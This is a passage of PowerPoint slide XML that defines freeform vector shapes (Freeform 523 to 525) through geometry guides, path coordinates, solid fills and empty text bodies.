              <a:gd name="T11" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T12" fmla="*/ 0 w 45"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T14" fmla="*/ 0 w 45"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T78" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T79" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T80" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T81" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T82" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T83" fmla="*/ 0 h 55"/>
              <a:gd name="T84" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T85" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T86" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T87" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T88" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T89" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T90" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T91" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T92" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T93" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T94" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T95" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T96" fmla="*/ 2147483647 w 45"/>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
              <a:gd name="T148" fmla="*/ 0 h 55"/>
              <a:gd name="T149" fmla="*/ 45 w 45"/>
              <a:gd name="T150" fmla="*/ 55 h 5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 h="55">
                <a:moveTo>
                  <a:pt x="3" y="5"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="5"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="999999"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10442" name="Freeform 523"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2749550" y="6459538"/>
            <a:ext cx="82550" cy="22225"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 37"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T2" fmla="*/ 0 w 37"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T4" fmla="*/ 0 w 37"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T21" fmla="*/ 0 h 10"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T23" fmla="*/ 0 h 10"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T25" fmla="*/ 0 h 10"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T27" fmla="*/ 0 h 10"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T66" fmla="*/ 0 w 37"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T68" fmla="*/ 0 w 37"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 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0"/>
              <a:gd name="T107" fmla="*/ 37 w 37"/>
              <a:gd name="T108" fmla="*/ 10 h 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0">
                <a:moveTo>
                  <a:pt x="0" y="7"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10443" name="Freeform 524"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2749550" y="6402388"/>
            <a:ext cx="82550" cy="25400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 37"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T2" fmla="*/ 0 w 37"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T4" fmla="*/ 0 w 37"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T21" fmla="*/ 0 h 11"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T23" fmla="*/ 0 h 11"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T25" fmla="*/ 0 h 11"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T27" fmla="*/ 0 h 11"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T66" fmla="*/ 0 w 37"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T68" fmla="*/ 0 w 37"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 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1"/>
              <a:gd name="T107" fmla="*/ 37 w 37"/>
              <a:gd name="T108" fmla="*/ 11 h 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1">
                <a:moveTo>
                  <a:pt x="0" y="7"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10444" name="Freeform 525"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2827337" y="6375400"/>
            <a:ext cx="136525" cy="257175"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 60"/>
              <a:gd name="T1" fmla="*/ 0 h 114"/>
              <a:gd name="T2" fmla="*/ 0 w 60"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 114"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 60"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 114"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 60"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 114"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 60"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 114"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 60"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 114"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 60"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 114"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 60"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 114"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 60"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 114"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 60"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 114"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 60"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 114"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 60"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 114"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 60"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 114"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 60"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 114"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 60"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 114"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 60"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 114"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 60"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 114"/>
              <a:gd name="T34" fmla="*/ 0 w 60"/>
              <a:gd name="T35" fmla="*/ 0 h 1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114"/>
              <a:gd name="T56" fmla="*/ 60 w 60"/>
              <a:gd name="T57" fmla="*/ 114 h 1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114">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="96"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="001999"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
